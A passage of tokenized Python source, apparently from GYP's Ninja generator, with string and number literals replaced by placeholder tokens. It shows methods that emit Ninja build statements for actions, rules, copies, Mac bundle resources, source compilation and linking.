all_outputs = [ ] <EOL> for action in actions : <EOL> name = '<STR_LIT>' % ( action [ '<STR_LIT>' ] , self . hash_for_rules ) <EOL> description = self . GenerateDescription ( '<STR_LIT>' , <EOL> action . get ( '<STR_LIT:message>' , None ) , <EOL> name ) <EOL> is_cygwin = ( self . msvs_settings . IsRuleRunUnderCygwin ( action ) <EOL> if self . 
flavor == '<STR_LIT>' else False ) <EOL> args = action [ '<STR_LIT:action>' ] <EOL> pool = '<STR_LIT>' if int ( action . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) else None <EOL> rule_name , _ = self . WriteNewNinjaRule ( name , args , description , <EOL> is_cygwin , env , pool ) <EOL> inputs = [ self . GypPathToNinja ( i , env ) for i in action [ '<STR_LIT>' ] ] <EOL> if int ( action . get ( '<STR_LIT>' , False ) ) : <EOL> extra_sources += action [ '<STR_LIT>' ] <EOL> if int ( action . get ( '<STR_LIT>' , False ) ) : <EOL> extra_mac_bundle_resources += action [ '<STR_LIT>' ] <EOL> outputs = [ self . GypPathToNinja ( o , env ) for o in action [ '<STR_LIT>' ] ] <EOL> self . ninja . build ( outputs , rule_name , inputs , <EOL> order_only = prebuild ) <EOL> all_outputs += outputs <EOL> self . ninja . newline ( ) <EOL> return all_outputs <EOL> def WriteRules ( self , rules , extra_sources , prebuild , <EOL> mac_bundle_resources , extra_mac_bundle_resources ) : <EOL> env = self . GetToolchainEnv ( ) <EOL> all_outputs = [ ] <EOL> for rule in rules : <EOL> if '<STR_LIT:action>' not in rule and not rule . get ( '<STR_LIT>' , [ ] ) : <EOL> continue <EOL> name = '<STR_LIT>' % ( rule [ '<STR_LIT>' ] , self . hash_for_rules ) <EOL> args = rule [ '<STR_LIT:action>' ] <EOL> description = self . GenerateDescription ( <EOL> '<STR_LIT>' , <EOL> rule . get ( '<STR_LIT:message>' , None ) , <EOL> ( '<STR_LIT>' + generator_default_variables [ '<STR_LIT>' ] ) % name ) <EOL> is_cygwin = ( self . msvs_settings . IsRuleRunUnderCygwin ( rule ) <EOL> if self . flavor == '<STR_LIT>' else False ) <EOL> pool = '<STR_LIT>' if int ( rule . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) else None <EOL> rule_name , args = self . 
WriteNewNinjaRule ( <EOL> name , args , description , is_cygwin , env , pool ) <EOL> special_locals = ( '<STR_LIT:source>' , '<STR_LIT:root>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> needed_variables = set ( [ '<STR_LIT:source>' ] ) <EOL> for argument in args : <EOL> for var in special_locals : <EOL> if '<STR_LIT>' % var in argument : <EOL> needed_variables . add ( var ) <EOL> def cygwin_munge ( path ) : <EOL> if is_cygwin : <EOL> return path . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> return path <EOL> inputs = [ self . GypPathToNinja ( i , env ) for i in rule . get ( '<STR_LIT>' , [ ] ) ] <EOL> sources = rule . get ( '<STR_LIT>' , [ ] ) <EOL> num_inputs = len ( inputs ) <EOL> if prebuild : <EOL> num_inputs += <NUM_LIT:1> <EOL> if num_inputs > <NUM_LIT:2> and len ( sources ) > <NUM_LIT:2> : <EOL> inputs = [ self . WriteCollapsedDependencies ( <EOL> rule [ '<STR_LIT>' ] , inputs , order_only = prebuild ) ] <EOL> prebuild = [ ] <EOL> for source in sources : <EOL> source = os . path . normpath ( source ) <EOL> dirname , basename = os . path . split ( source ) <EOL> root , ext = os . path . splitext ( basename ) <EOL> outputs = [ self . ExpandRuleVariables ( o , root , dirname , <EOL> source , ext , basename ) <EOL> for o in rule [ '<STR_LIT>' ] ] <EOL> if int ( rule . get ( '<STR_LIT>' , False ) ) : <EOL> extra_sources += outputs <EOL> was_mac_bundle_resource = source in mac_bundle_resources <EOL> if was_mac_bundle_resource or int ( rule . get ( '<STR_LIT>' , False ) ) : <EOL> extra_mac_bundle_resources += outputs <EOL> if was_mac_bundle_resource : <EOL> mac_bundle_resources . remove ( source ) <EOL> extra_bindings = [ ] <EOL> for var in needed_variables : <EOL> if var == '<STR_LIT:root>' : <EOL> extra_bindings . append ( ( '<STR_LIT:root>' , cygwin_munge ( root ) ) ) <EOL> elif var == '<STR_LIT>' : <EOL> dirname_expanded = self . ExpandSpecial ( dirname , self . base_to_build ) <EOL> extra_bindings . 
append ( ( '<STR_LIT>' , cygwin_munge ( dirname_expanded ) ) ) <EOL> elif var == '<STR_LIT:source>' : <EOL> source_expanded = self . ExpandSpecial ( source , self . base_to_build ) <EOL> extra_bindings . append ( ( '<STR_LIT:source>' , cygwin_munge ( source_expanded ) ) ) <EOL> elif var == '<STR_LIT>' : <EOL> extra_bindings . append ( ( '<STR_LIT>' , ext ) ) <EOL> elif var == '<STR_LIT:name>' : <EOL> extra_bindings . append ( ( '<STR_LIT:name>' , cygwin_munge ( basename ) ) ) <EOL> else : <EOL> assert var == None , repr ( var ) <EOL> outputs = [ self . GypPathToNinja ( o , env ) for o in outputs ] <EOL> if self . flavor == '<STR_LIT>' : <EOL> extra_bindings . append ( ( '<STR_LIT>' , <EOL> hashlib . md5 ( outputs [ <NUM_LIT:0> ] ) . hexdigest ( ) ) ) <EOL> self . ninja . build ( outputs , rule_name , self . GypPathToNinja ( source ) , <EOL> implicit = inputs , <EOL> order_only = prebuild , <EOL> variables = extra_bindings ) <EOL> all_outputs . extend ( outputs ) <EOL> return all_outputs <EOL> def WriteCopies ( self , copies , prebuild , mac_bundle_depends ) : <EOL> outputs = [ ] <EOL> env = self . GetToolchainEnv ( ) <EOL> for copy in copies : <EOL> for path in copy [ '<STR_LIT>' ] : <EOL> path = os . path . normpath ( path ) <EOL> basename = os . path . split ( path ) [ <NUM_LIT:1> ] <EOL> src = self . GypPathToNinja ( path , env ) <EOL> dst = self . GypPathToNinja ( os . path . join ( copy [ '<STR_LIT>' ] , basename ) , <EOL> env ) <EOL> outputs += self . ninja . build ( dst , '<STR_LIT>' , src , order_only = prebuild ) <EOL> if self . is_mac_bundle : <EOL> if dst . startswith ( self . xcode_settings . GetBundleContentsFolderPath ( ) ) : <EOL> mac_bundle_depends . append ( dst ) <EOL> return outputs <EOL> def WriteMacBundleResources ( self , resources , bundle_depends ) : <EOL> """<STR_LIT>""" <EOL> xcassets = [ ] <EOL> for output , res in gyp . xcode_emulation . GetMacBundleResources ( <EOL> generator_default_variables [ '<STR_LIT>' ] , <EOL> self . 
xcode_settings , map ( self . GypPathToNinja , resources ) ) : <EOL> output = self . ExpandSpecial ( output ) <EOL> if os . path . splitext ( output ) [ - <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> self . ninja . build ( output , '<STR_LIT>' , res , <EOL> variables = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> bundle_depends . append ( output ) <EOL> else : <EOL> xcassets . append ( res ) <EOL> return xcassets <EOL> def WriteMacXCassets ( self , xcassets , bundle_depends ) : <EOL> """<STR_LIT>""" <EOL> if not xcassets : <EOL> return <EOL> extra_arguments = { } <EOL> settings_to_arg = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> settings = self . xcode_settings . xcode_settings [ self . config_name ] <EOL> for settings_key , arg_name in settings_to_arg . iteritems ( ) : <EOL> value = settings . get ( settings_key ) <EOL> if value : <EOL> extra_arguments [ arg_name ] = value <EOL> partial_info_plist = None <EOL> if extra_arguments : <EOL> partial_info_plist = self . GypPathToUniqueOutput ( <EOL> '<STR_LIT>' ) <EOL> extra_arguments [ '<STR_LIT>' ] = partial_info_plist <EOL> outputs = [ ] <EOL> outputs . append ( <EOL> os . path . join ( <EOL> self . xcode_settings . GetBundleResourceFolder ( ) , <EOL> '<STR_LIT>' ) ) <EOL> if partial_info_plist : <EOL> outputs . append ( partial_info_plist ) <EOL> keys = QuoteShellArgument ( json . dumps ( extra_arguments ) , self . flavor ) <EOL> extra_env = self . xcode_settings . GetPerTargetSettings ( ) <EOL> env = self . GetSortedXcodeEnv ( additional_settings = extra_env ) <EOL> env = self . ComputeExportEnvString ( env ) <EOL> bundle_depends . extend ( self . ninja . build ( <EOL> outputs , '<STR_LIT>' , xcassets , <EOL> variables = [ ( '<STR_LIT>' , env ) , ( '<STR_LIT>' , keys ) ] ) ) <EOL> return partial_info_plist <EOL> def WriteMacInfoPlist ( self , partial_info_plist , bundle_depends ) : <EOL> """<STR_LIT>""" <EOL> info_plist , out , defines , extra_env = gyp . xcode_emulation . 
GetMacInfoPlist ( <EOL> generator_default_variables [ '<STR_LIT>' ] , <EOL> self . xcode_settings , self . GypPathToNinja ) <EOL> if not info_plist : <EOL> return <EOL> out = self . ExpandSpecial ( out ) <EOL> if defines : <EOL> intermediate_plist = self . GypPathToUniqueOutput ( <EOL> os . path . basename ( info_plist ) ) <EOL> defines = '<STR_LIT:U+0020>' . join ( [ Define ( d , self . flavor ) for d in defines ] ) <EOL> info_plist = self . ninja . build ( <EOL> intermediate_plist , '<STR_LIT>' , info_plist , <EOL> variables = [ ( '<STR_LIT>' , defines ) ] ) <EOL> env = self . GetSortedXcodeEnv ( additional_settings = extra_env ) <EOL> env = self . ComputeExportEnvString ( env ) <EOL> if partial_info_plist : <EOL> intermediate_plist = self . GypPathToUniqueOutput ( '<STR_LIT>' ) <EOL> info_plist = self . ninja . build ( <EOL> intermediate_plist , '<STR_LIT>' , <EOL> [ partial_info_plist , info_plist ] ) <EOL> keys = self . xcode_settings . GetExtraPlistItems ( self . config_name ) <EOL> keys = QuoteShellArgument ( json . dumps ( keys ) , self . flavor ) <EOL> self . ninja . build ( out , '<STR_LIT>' , info_plist , <EOL> variables = [ ( '<STR_LIT>' , env ) , ( '<STR_LIT>' , keys ) ] ) <EOL> bundle_depends . append ( out ) <EOL> def WriteSources ( self , ninja_file , config_name , config , sources , predepends , <EOL> precompiled_header , spec ) : <EOL> """<STR_LIT>""" <EOL> if self . toolset == '<STR_LIT:host>' : <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if self . flavor != '<STR_LIT>' or len ( self . archs ) == <NUM_LIT:1> : <EOL> return self . WriteSourcesForArch ( <EOL> self . 
ninja , config_name , config , sources , predepends , <EOL> precompiled_header , spec ) <EOL> else : <EOL> return dict ( ( arch , self . WriteSourcesForArch ( <EOL> self . arch_subninjas [ arch ] , config_name , config , sources , predepends , <EOL> precompiled_header , spec , arch = arch ) ) <EOL> for arch in self . archs ) <EOL> def WriteSourcesForArch ( self , ninja_file , config_name , config , sources , <EOL> predepends , precompiled_header , spec , arch = None ) : <EOL> """<STR_LIT>""" <EOL> extra_defines = [ ] <EOL> if self . flavor == '<STR_LIT>' : <EOL> cflags = self . xcode_settings . GetCflags ( config_name , arch = arch ) <EOL> cflags_c = self . xcode_settings . GetCflagsC ( config_name ) <EOL> cflags_cc = self . xcode_settings . GetCflagsCC ( config_name ) <EOL> cflags_objc = [ '<STR_LIT>' ] + self . xcode_settings . GetCflagsObjC ( config_name ) <EOL> cflags_objcc = [ '<STR_LIT>' ] + self . xcode_settings . GetCflagsObjCC ( config_name ) <EOL> elif self . flavor == '<STR_LIT>' : <EOL> asmflags = self . msvs_settings . GetAsmflags ( config_name ) <EOL> cflags = self . msvs_settings . GetCflags ( config_name ) <EOL> cflags_c = self . msvs_settings . GetCflagsC ( config_name ) <EOL> cflags_cc = self . msvs_settings . GetCflagsCC ( config_name ) <EOL> extra_defines = self . msvs_settings . GetComputedDefines ( config_name ) <EOL> pdbpath_c = pdbpath_cc = self . msvs_settings . GetCompilerPdbName ( <EOL> config_name , self . ExpandSpecial ) <EOL> if not pdbpath_c : <EOL> obj = '<STR_LIT>' <EOL> if self . toolset != '<STR_LIT:target>' : <EOL> obj += '<STR_LIT:.>' + self . toolset <EOL> pdbpath = os . path . normpath ( os . path . join ( obj , self . base_dir , self . name ) ) <EOL> pdbpath_c = pdbpath + '<STR_LIT>' <EOL> pdbpath_cc = pdbpath + '<STR_LIT>' <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , [ pdbpath_c ] ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , [ pdbpath_cc ] ) <EOL> self . 
WriteVariableList ( ninja_file , '<STR_LIT>' , [ self . name ] ) <EOL> else : <EOL> cflags = config . get ( '<STR_LIT>' , [ ] ) <EOL> cflags_c = config . get ( '<STR_LIT>' , [ ] ) <EOL> cflags_cc = config . get ( '<STR_LIT>' , [ ] ) <EOL> if self . toolset == '<STR_LIT:target>' : <EOL> cflags_c = ( os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) + <EOL> os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) + cflags_c ) <EOL> cflags_cc = ( os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) + <EOL> os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) + cflags_cc ) <EOL> defines = config . get ( '<STR_LIT>' , [ ] ) + extra_defines <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> [ Define ( d , self . flavor ) for d in defines ] ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , asmflags ) ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> [ QuoteShellArgument ( self . ExpandSpecial ( f ) , self . flavor ) <EOL> for f in self . msvs_settings . GetRcflags ( config_name , <EOL> self . GypPathToNinja ) ] ) <EOL> include_dirs = config . get ( '<STR_LIT>' , [ ] ) <EOL> env = self . GetToolchainEnv ( ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> include_dirs = self . msvs_settings . AdjustIncludeDirs ( include_dirs , <EOL> config_name ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> [ QuoteShellArgument ( '<STR_LIT>' + self . GypPathToNinja ( i , env ) , self . flavor ) <EOL> for i in include_dirs ] ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> midl_include_dirs = config . get ( '<STR_LIT>' , [ ] ) <EOL> midl_include_dirs = self . msvs_settings . AdjustMidlIncludeDirs ( <EOL> midl_include_dirs , config_name ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> [ QuoteShellArgument ( '<STR_LIT>' + self . GypPathToNinja ( i , env ) , self . 
flavor ) <EOL> for i in midl_include_dirs ] ) <EOL> pch_commands = precompiled_header . GetPchBuildCommands ( arch ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> for ext , var in [ ( '<STR_LIT:c>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:m>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> include = precompiled_header . GetInclude ( ext , arch ) <EOL> if include : ninja_file . variable ( var , include ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , cflags ) ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , cflags_c ) ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , cflags_cc ) ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , cflags_objc ) ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , cflags_objcc ) ) <EOL> ninja_file . newline ( ) <EOL> outputs = [ ] <EOL> has_rc_source = False <EOL> for source in sources : <EOL> filename , ext = os . path . splitext ( source ) <EOL> ext = ext [ <NUM_LIT:1> : ] <EOL> obj_ext = self . obj_ext <EOL> if ext in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> command = '<STR_LIT>' <EOL> self . uses_cpp = True <EOL> elif ext == '<STR_LIT:c>' or ( ext == '<STR_LIT:S>' and self . flavor != '<STR_LIT>' ) : <EOL> command = '<STR_LIT>' <EOL> elif ext == '<STR_LIT:s>' and self . flavor != '<STR_LIT>' : <EOL> command = '<STR_LIT>' <EOL> elif ( self . flavor == '<STR_LIT>' and ext == '<STR_LIT>' and <EOL> self . msvs_settings . GetArch ( config_name ) == '<STR_LIT>' and <EOL> not self . msvs_settings . HasExplicitAsmRules ( spec ) ) : <EOL> command = '<STR_LIT>' <EOL> obj_ext = '<STR_LIT>' <EOL> elif self . flavor == '<STR_LIT>' and ext == '<STR_LIT:m>' : <EOL> command = '<STR_LIT>' <EOL> elif self . 
flavor == '<STR_LIT>' and ext == '<STR_LIT>' : <EOL> command = '<STR_LIT>' <EOL> self . uses_cpp = True <EOL> elif self . flavor == '<STR_LIT>' and ext == '<STR_LIT>' : <EOL> command = '<STR_LIT>' <EOL> obj_ext = '<STR_LIT>' <EOL> has_rc_source = True <EOL> else : <EOL> continue <EOL> input = self . GypPathToNinja ( source ) <EOL> output = self . GypPathToUniqueOutput ( filename + obj_ext ) <EOL> if arch is not None : <EOL> output = AddArch ( output , arch ) <EOL> implicit = precompiled_header . GetObjDependencies ( [ input ] , [ output ] , arch ) <EOL> variables = [ ] <EOL> if self . flavor == '<STR_LIT>' : <EOL> variables , output , implicit = precompiled_header . GetFlagsModifications ( <EOL> input , output , implicit , command , cflags_c , cflags_cc , <EOL> self . ExpandSpecial ) <EOL> ninja_file . build ( output , command , input , <EOL> implicit = [ gch for _ , _ , gch in implicit ] , <EOL> order_only = predepends , variables = variables ) <EOL> outputs . append ( output ) <EOL> if has_rc_source : <EOL> resource_include_dirs = config . get ( '<STR_LIT>' , include_dirs ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> [ QuoteShellArgument ( '<STR_LIT>' + self . GypPathToNinja ( i , env ) , self . flavor ) <EOL> for i in resource_include_dirs ] ) <EOL> self . WritePchTargets ( ninja_file , pch_commands ) <EOL> ninja_file . newline ( ) <EOL> return outputs <EOL> def WritePchTargets ( self , ninja_file , pch_commands ) : <EOL> """<STR_LIT>""" <EOL> if not pch_commands : <EOL> return <EOL> for gch , lang_flag , lang , input in pch_commands : <EOL> var_name = { <EOL> '<STR_LIT:c>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:m>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } [ lang ] <EOL> map = { '<STR_LIT:c>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:m>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , } <EOL> cmd = map . get ( lang ) <EOL> ninja_file . 
build ( gch , cmd , input , variables = [ ( var_name , lang_flag ) ] ) <EOL> def WriteLink ( self , spec , config_name , config , link_deps ) : <EOL> """<STR_LIT>""" <EOL> if self . flavor != '<STR_LIT>' or len ( self . archs ) == <NUM_LIT:1> : <EOL> return self . WriteLinkForArch ( <EOL> self . ninja , spec , config_name , config , link_deps ) <EOL> else : <EOL> output = self . ComputeOutput ( spec ) <EOL> inputs = [ self . WriteLinkForArch ( self . arch_subninjas [ arch ] , spec , <EOL> config_name , config , link_deps [ arch ] , <EOL> arch = arch ) <EOL> for arch in self . archs ] <EOL> extra_bindings = [ ] <EOL> build_output = output <EOL> if not self . is_mac_bundle : <EOL> self . AppendPostbuildVariable ( extra_bindings , spec , output , output ) <EOL> if ( spec [ '<STR_LIT:type>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) and <EOL> not self . is_mac_bundle ) : <EOL> extra_bindings . append ( ( '<STR_LIT>' , output ) ) <EOL> self . ninja . build ( [ output , output + '<STR_LIT>' ] , '<STR_LIT>' , inputs , <EOL> variables = extra_bindings ) <EOL> else : <EOL> self . ninja . build ( build_output , '<STR_LIT>' , inputs , variables = extra_bindings ) <EOL> return output <EOL> def WriteLinkForArch ( self , ninja_file , spec , config_name , config , <EOL> link_deps , arch = None ) : <EOL> """<STR_LIT>""" <EOL> command = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } [ spec [ '<STR_LIT:type>' ] ] <EOL> command_suffix = '<STR_LIT>' <EOL> implicit_deps = set ( ) <EOL> solibs = set ( ) <EOL> if '<STR_LIT>' in spec : <EOL> extra_link_deps = set ( ) <EOL> for dep in spec [ '<STR_LIT>' ] : <EOL> target = self . target_outputs . get ( dep ) <EOL> if not target : <EOL> continue <EOL> linkable = target . Linkable ( ) <EOL> if linkable : <EOL> new_deps = [ ] <EOL> if ( self . flavor == '<STR_LIT>' and <EOL> target . component_objs and <EOL> self . msvs_settings . 
IsUseLibraryDependencyInputs ( config_name ) ) : <EOL> new_deps = target . component_objs <EOL> elif self . flavor == '<STR_LIT>' and target . import_lib : <EOL> new_deps = [ target . import_lib ] <EOL> elif target . UsesToc ( self . flavor ) : <EOL> solibs . add ( target . binary ) <EOL> implicit_deps . add ( target . binary + '<STR_LIT>' ) <EOL> else : <EOL> new_deps = [ target . binary ] <EOL> for new_dep in new_deps : <EOL> if new_dep not in extra_link_deps : <EOL> extra_link_deps . add ( new_dep ) <EOL> link_deps . append ( new_dep ) <EOL> final_output = target . FinalOutput ( ) <EOL> if not linkable or final_output != target . binary : <EOL> implicit_deps . add ( final_output ) <EOL> extra_bindings = [ ] <EOL> if self . uses_cpp and self . flavor != '<STR_LIT>' : <EOL> extra_bindings . append ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> output = self . ComputeOutput ( spec , arch ) <EOL> if arch is None and not self . is_mac_bundle : <EOL> self . AppendPostbuildVariable ( extra_bindings , spec , output , output ) <EOL> is_executable = spec [ '<STR_LIT:type>' ] == '<STR_LIT>' <EOL> env_ldflags = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> ldflags = self . xcode_settings . GetLdflags ( config_name , <EOL> self . ExpandSpecial ( generator_default_variables [ '<STR_LIT>' ] ) , <EOL> self . GypPathToNinja , arch ) <EOL> ldflags = env_ldflags + ldflags <EOL> elif self . flavor == '<STR_LIT>' : <EOL> manifest_base_name = self . GypPathToUniqueOutput ( <EOL> self . ComputeOutputFileName ( spec ) ) <EOL> ldflags , intermediate_manifest , manifest_files = self . msvs_settings . GetLdflags ( config_name , self . GypPathToNinja , <EOL> self . ExpandSpecial , manifest_base_name , <EOL> output , is_executable , <EOL> self . toplevel_build ) <EOL> ldflags = env_ldflags + ldflags <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , manifest_files ) <EOL> implicit_deps = implicit_deps . 
union ( manifest_files ) <EOL> if intermediate_manifest : <EOL> self . WriteVariableList ( <EOL> ninja_file , '<STR_LIT>' , [ intermediate_manifest ] ) <EOL> command_suffix = _GetWinLinkRuleNameSuffix ( <EOL> self . msvs_settings . IsEmbedManifest ( config_name ) ) <EOL> def_file = self . msvs_settings . GetDefFile ( self . GypPathToNinja ) <EOL> if def_file : <EOL> implicit_deps . add ( def_file ) <EOL> else : <EOL> ldflags = env_ldflags + config . get ( '<STR_LIT>' , [ ] ) <EOL> if is_executable and len ( solibs ) : <EOL> rpath = '<STR_LIT>' <EOL> if self . toolset != '<STR_LIT:target>' : <EOL> rpath += self . toolset <EOL> ldflags . append ( r'<STR_LIT>' % rpath ) <EOL> ldflags . append ( '<STR_LIT>' % rpath ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> gyp . common . uniquer ( map ( self . ExpandSpecial , ldflags ) ) ) <EOL> library_dirs = config . get ( '<STR_LIT>' , [ ] ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> library_dirs = [ self . msvs_settings . ConvertVSMacros ( l , config_name ) <EOL> for l in library_dirs ] <EOL> library_dirs = [ '<STR_LIT>' + QuoteShellArgument ( self . GypPathToNinja ( l ) , <EOL> self . flavor ) <EOL> for l in library_dirs ] <EOL> else : <EOL> library_dirs = [ QuoteShellArgument ( '<STR_LIT>' + self . GypPathToNinja ( l ) , <EOL> self . flavor ) <EOL> for l in library_dirs ] <EOL> libraries = gyp . common . uniquer ( map ( self . ExpandSpecial , <EOL> spec . get ( '<STR_LIT>' , [ ] ) ) ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> libraries = self . xcode_settings . AdjustLibraries ( libraries , config_name ) <EOL> elif self . flavor == '<STR_LIT>' : <EOL> libraries = self . msvs_settings . AdjustLibraries ( libraries ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , library_dirs + libraries ) <EOL> linked_binary = output <EOL> if command in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> extra_bindings . append ( ( '<STR_LIT>' , os . path . split ( output ) [ <NUM_LIT:1> ] ) ) <EOL> extra_bindings . 
append ( ( '<STR_LIT>' , <EOL> gyp . common . EncodePOSIXShellArgument ( output ) ) ) <EOL> if self . flavor != '<STR_LIT>' : <EOL> link_file_list = output <EOL> if self . is_mac_bundle : <EOL> link_file_list = self . xcode_settings . GetWrapperName ( ) <EOL> if arch : <EOL> link_file_list += '<STR_LIT:.>' + arch <EOL> link_file_list += '<STR_LIT>' <EOL> link_file_list = link_file_list . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> extra_bindings . append ( <EOL> ( '<STR_LIT>' , <EOL> gyp . common . EncodePOSIXShellArgument ( link_file_list ) ) ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> extra_bindings . append ( ( '<STR_LIT>' , output ) ) <EOL> if '<STR_LIT>' not in ldflags : <EOL> self . target . import_lib = output + '<STR_LIT>' <EOL> extra_bindings . append ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' % self . target . import_lib ) ) <EOL> pdbname = self . msvs_settings . GetPDBName ( <EOL> config_name , self . ExpandSpecial , output + '<STR_LIT>' ) <EOL> output = [ output , self . target . import_lib ] <EOL> if pdbname : <EOL> output . append ( pdbname ) <EOL> elif not self . is_mac_bundle : <EOL> output = [ output , output + '<STR_LIT>' ] <EOL> else : <EOL> command = command + '<STR_LIT>' <EOL> elif self . flavor == '<STR_LIT>' : <EOL> extra_bindings . append ( ( '<STR_LIT>' , output ) ) <EOL> pdbname = self . msvs_settings . GetPDBName ( <EOL> config_name , self . ExpandSpecial , output + '<STR_LIT>' ) <EOL> if pdbname : <EOL> output = [ output , pdbname ] <EOL> if len ( solibs ) : <EOL> extra_bindings . append ( ( '<STR_LIT>' , gyp . common . EncodePOSIXShellList ( solibs ) ) ) <EOL> ninja_file . build ( output , command + command_suffix , link_deps , <EOL> implicit = list ( implicit_deps ) , <EOL> variables = extra_bindings ) <EOL> return linked_binary <EOL> def WriteTarget ( self , spec , config_name , config , link_deps , compile_deps ) : <EOL> extra_link_deps = any ( self . target_outputs . get ( dep ) . Linkable ( ) <EOL> for dep in spec . 
get ( '<STR_LIT>' , [ ] ) <EOL> if dep in self . target_outputs ) <EOL> if spec [ '<STR_LIT:type>' ] == '<STR_LIT:none>' or ( not link_deps and not extra_link_deps ) : <EOL> self . target . binary = compile_deps <EOL> self . target . type = '<STR_LIT:none>' <EOL> elif spec [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> self . target . binary = self . ComputeOutput ( spec ) <EOL> if ( self . flavor not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) and not <EOL> self . is_standalone_static_library ) : <EOL> self . ninja . build ( self . target . binary , '<STR_LIT>' , link_deps , <EOL> order_only = compile_deps ) <EOL> else : <EOL> variables = [ ] <EOL> if self . xcode_settings : <EOL> libtool_flags = self . xcode_settings . GetLibtoolflags ( config_name ) <EOL> if libtool_flags : <EOL> variables . append ( ( '<STR_LIT>' , libtool_flags ) ) <EOL> if self . msvs_settings : <EOL> libflags = self . msvs_settings . GetLibFlags ( config_name , <EOL> self . GypPathToNinja ) <EOL> variables . append ( ( '<STR_LIT>' , libflags ) ) <EOL> if self . flavor != '<STR_LIT>' or len ( self . archs ) == <NUM_LIT:1> : <EOL> self . AppendPostbuildVariable ( variables , spec , <EOL> self . target . binary , self . target . binary ) <EOL> self . ninja . build ( self . target . binary , '<STR_LIT>' , link_deps , <EOL> order_only = compile_deps , variables = variables ) <EOL> else : <EOL> inputs = [ ] <EOL> for arch in self . archs : <EOL> output = self . ComputeOutput ( spec , arch ) <EOL> self . arch_subninjas [ arch ] . build ( output , '<STR_LIT>' , link_deps [ arch ] , <EOL> order_only = compile_deps , <EOL> variables = variables ) <EOL> inputs . append ( output ) <EOL> self . AppendPostbuildVariable ( variables , spec , <EOL> self . target . binary , self . target . binary ) <EOL> self . ninja . build ( self . target . binary , '<STR_LIT>' , inputs , <EOL> variables = variables ) <EOL> else : <EOL> self . target . binary = self . 
